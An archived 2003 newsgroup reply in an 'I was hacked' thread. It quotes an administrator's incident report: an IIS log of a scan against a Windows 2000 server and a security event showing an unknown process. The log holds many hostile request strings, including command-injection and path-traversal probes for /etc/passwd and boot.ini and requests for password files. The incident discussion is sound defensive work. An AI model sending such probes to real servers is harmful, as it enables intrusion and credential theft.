Re: I was hacked

From: Patrick Kremer (n/a)
Date: 08/05/03

Next message: George: "How to design a secure file transfer application ?"

Previous message: anna keynow: "Re: Virtual Private Network - Beware it's a Hackers Secret"
In reply to: George Hester: "Re: I was hacked"
Next in thread: SAge: "Re: I was hacked"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 5 Aug 2003 00:09:16 -0500

I don't know how it relates to this whole thing, but A~NSISu_.exe sounds
quite a bit like Nullsoft Install System (create a Win32 self-extracting
executable installer) http://www.nullsoft.com/free/nsis/.

"George Hester" <hesterloli@hotmail.com> wrote in message
news:eLSB$JoWDHA.3924@tk2msftngp13.phx.gbl...
I saw no successes in your IIS Log. Believe me if that was true for all
your connections you wouldn't be serving nothing.

-- 
George Hester
__________________________________
"Frank" <frank@nospamplease.com> wrote in message
news:VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.net...
> I have a Windows 2000 server that is current w/ the latest patches from
MS.
> It is running an IIS server that is configured w/ Microsoft's URLScan
tool.
> It is also running Terminal Services w/ 128 bit encryption turned on.  I
> have a firewall configured to allow only inbound/outbound HTTP traffic on
> port 80 and Terminal Services.  I'm also running Snort as an IDS, a virus
> scanner that updates/scans nightly.  I have Windows security auditing
turned
> on.  I've also hardened the system by turning off all unnecessary service
> and making all the appropriate registry changes to restrict a access (e.g.
> disabling anonymous access).
>
> Sounds somewhat secure, right?
>
> Last night I was hacked.  I'm still trying to sort out what happened.  I
saw
> a series of attempts to attack IIS that the IIS log claimed were coming
from
> itself.  Unfortunately, my firewall was not logging HTTP traffic -
although
> I think I have the source ip via Snort.  All these attacks failed.  Next,
I
> saw a series of logon failures using Terminal Services.  Again, all of
these
> failed.  Then, a few minutes later, I mysteriously see a process called
> A~NSISu_.exe.  This seems to come out of nowhere.  Prior to this I did not
> see any cmd sessions or anything else that suggests the attacker
> successfully breached my server
>
> Below is the web log followed by the event in the event viewer that showed
> the first visible process of the attack.  Following this, I saw a series
of
> proccesses start (cmd.exe, nbstat, route).
>
> I can take care of reinstalling and hardening my system.  I have one
primary
> concern at this stage: understanding how they cracked my server.  If you
> have advice or suggestions, it would be appreciated.
>
>
>
>
>
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/*.idc 404 4184 21 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /iisadmin/ - 404 4184 25 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan>
>
~/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
>
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
>
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
>
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
>
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
>
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
>
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
>
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
>
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
>
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
>
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
>
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
> 0.htr 404 4184 931 16 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /msadc/msadcs.dll - 404 4184 32 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/iisadmin/bdir.htr 404 4184 41 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/issamples/query.idq 404 4184 46 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/issamples/fastq.idq 404 4184 46 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/exair/search/search.idq 404 4184 50
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/exair/search/query.idq 404 4184 49
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/prxdocs/misc/prxrch.idq 404 4184 39 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qfullhit.htw 404 4184
143
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qsumrhit.htw 404 4184
143
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/abczxv.htw 404 4184 26 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cfcache.map - 404 4184 27 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_pvt/administrators.pwd - 403 4358 43 344 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_pvt/authors.pwd - 403 4358 36 16 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_pvt/users.pwd - 403 4358 34 16 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_pvt/service.pwd - 403 4358 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 POST
> /_vti_bin/shtml.dll/_vti_rpc - 405 4230 368 15 10.2.2.50 MSFrontPage/4.0
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/ - 404 4184 24 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /scripts/ - 401 4572 48 47 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/sh - 404 4184 26 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/csh - 404 4184 27 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/ksh - 404 4184 27 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/cmd.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/cmd.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/cmd32.exe 404 4184 33 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/cmd32.exe 404 4184 33 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/perl.exe 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/perl.exe 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/tools/newdsn.exe 404 4184 40 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/_vti_bin/fpcount.exe 404 4184 71 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/rightfax/fuwww.dll/ 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /iissamples/issamples/query.asp - 403 4270 46 78 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /samples/search/queryhit.htm - 404 4184 43 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /scripts/*+.pl - 401 4572 62 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /iissamples/exair/search/advsearch.asp - 403 4270 53 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/iisadmpwd/aexp3.htr 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /scripts/repost.asp - 403 4270 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/ 404 4184 20 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/users/ 404 4184 26 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/ 404 4184 28 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/ 404 4184 28 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /iissamples/exair/howitworks/codebrws.asp - 403 4270 56 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /msadc/samples/selector/showcode.asp - 403 4270 51 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /index.htm PageServices 200 0 29 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /search - 404 4184 23 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /index.html+ - 404 4184 29 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/rguest.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/rguest.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/wguest.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/wguest.exe 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/get32.exe 404 4184 33 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/alibaba.pl - 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/tst.bat 404 4184 31 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-win/uploader.exe 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/FormHandler.cgi - 404 4184 39 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/testcgi - 404 4184 31 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/test-cgi/* * 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/test.cgi - 404 4184 32 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/enivron.pl - 404 4184 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /scripts/environ.pl - 401 4572 68 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /server-info - 404 4184 27 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /server-status - 404 4184 29 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/tcsh - 404 4184 28 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/cgitest.exe 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /~root - 404 4184 21 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/~ftp -
> 404 4184 20 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/phf Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= 404 4184
> 80 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/count.cgi - 404 4184 33 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/nph-test-cgi - 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/webdist.cgi - 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/aglimpse.cgi - 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/campas %0acat%0a/etc/passwd%0a 404 4184 54 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/jj - 404 4184 26 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/formmail - 404 4184 32 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/formmail.pl - 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/faxsurvey /bin/cat%20/etc/passwd 404 4184 56 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/view-source ../../../../../../../etc/passwd 404 4184 67 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/srchadm/webhits.exe 404 4184 43 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/tools/mkilog.exe 404 4184 40 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/tools/mkplog.exe 404 4184 40 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/query mss=../../../../../../../etc/passwd 404 4184 65 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/htimage.exe 404 4184 39 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/htimage.exe 404 4184 39 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49
0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50
> 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /robots.txt - 404 4184 26 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/echo.bat 404 4184 41 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/hello.bat 404 4184 42 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/htsearch exclude=%60/etc/passwd%60 404 4184 58 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/ezshopper/loadpage.cgi user_id=1&file=|cat%20/etc/passwd| 404
4184
> 81 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/ezshopper/search.cgi
>
user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&dist
> inct=1 404 4184 127 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/names.nsf/ 404 4184 31 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/catalog.nsf/ 404 4184 33 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/log.nsf/ 404 4184 29 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/domlog.nsf/ 404 4184 32 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/domcfg.nsf/ 404 4184 32 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/sojourn.cgi cat=../../../../../../../etc/passwd 404 4184 71 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/ows-bin/perlidlc.bat 404 4184 41 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-bin/windmail.exe 404 4184 36 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_bin/shtml.dll - 403 4358 34 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /.htaccess - 404 4184 25 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /_vti_pvt/doctodep.btr - 403 4358 37 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /carbo.dll icatcommand=..\..\..\..\boot.ini&catalogname=catalog 404 4184
78
> 16 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cfdocs/expeval/ExprCalc.cfm OpenFilePath=c:\boot.ini 404 4184 68 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cfdocs/expeval/openfile.cfm - 404 4184 43 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/pfdispaly.cgi '%0A/bin/uname%20-a|' 404 4184 59 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/MachineInfo - 404 4184 35 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /mylog.phtml screen=/etc/passwd 404 4184 46 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /mlog.phtml screen=/etc/passwd 404 4184 45 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /cgi-bin/wrap - 404 4184 28 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/ows-bin/oasnetconf.exe 404 4184 72 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/ows-bin/oaskill.exe 404 4184 45 0 - -
> 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
> /<Rejected-By-UrlScan> ~/cgi-shl/win-c-sample.exe 404 4184 40 0 - -
>
>
>
>
> Event Type: Success Audit
> Event Source: Security
> Event Category: Detailed Tracking
> Event ID: 592
> Date:  8/2/2003
> Time:  2:50:28 AM
> User:  MYSERVER\MyAdmin
> Computer: MYSERVER
> Description:
> A new process has been created:
>   New Process ID: 1764
>   Image File Name: \DOCUME~1\ADMINI~1\LOCALS~1\Temp\A~NSISu_.exe
>   Creator Process ID: 1916
>   User Name: MyAdmin
>   Domain:  MYSERVER
>   Logon ID:  (0x0,0xDE65)
>
>
>
>
>

Next message: George: "How to design a secure file transfer application ?"

Previous message: anna keynow: "Re: Virtual Private Network - Beware it's a Hackers Secret"
In reply to: George Hester: "Re: I was hacked"
Next in thread: SAge: "Re: I was hacked"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: I was hacked
... > I have a Windows 2000 server that is current w/ the latest patches from MS. ... > It is running an IIS server that is configured w/ Microsoft's URLScan tool. ... > It is also running Terminal Services w/ 128 bit encryption turned on. ... > the first visible process of the attack. ...
(alt.computer.security)
Re: I was hacked
... > I have a Windows 2000 server that is current w/ the latest patches from MS. ... > It is running an IIS server that is configured w/ Microsoft's URLScan tool. ... > It is also running Terminal Services w/ 128 bit encryption turned on. ... > the first visible process of the attack. ...
(microsoft.public.inetserver.iis.security)
Re: I was hacked
... I saw no successes in your IIS Log. ... > It is running an IIS server that is configured w/ Microsoft's URLScan ... > It is also running Terminal Services w/ 128 bit encryption turned on. ... > the first visible process of the attack. ...
(microsoft.public.inetserver.iis.security)
Re: I was hacked
... I saw no successes in your IIS Log. ... > It is also running Terminal Services w/ 128 bit encryption turned on. ... > the first visible process of the attack. ...
(alt.computer.security)
Re: I was hacked
... I saw no successes in your IIS Log. ... > It is also running Terminal Services w/ 128 bit encryption turned on. ... > the first visible process of the attack. ...
(microsoft.public.inetserver.iis.security)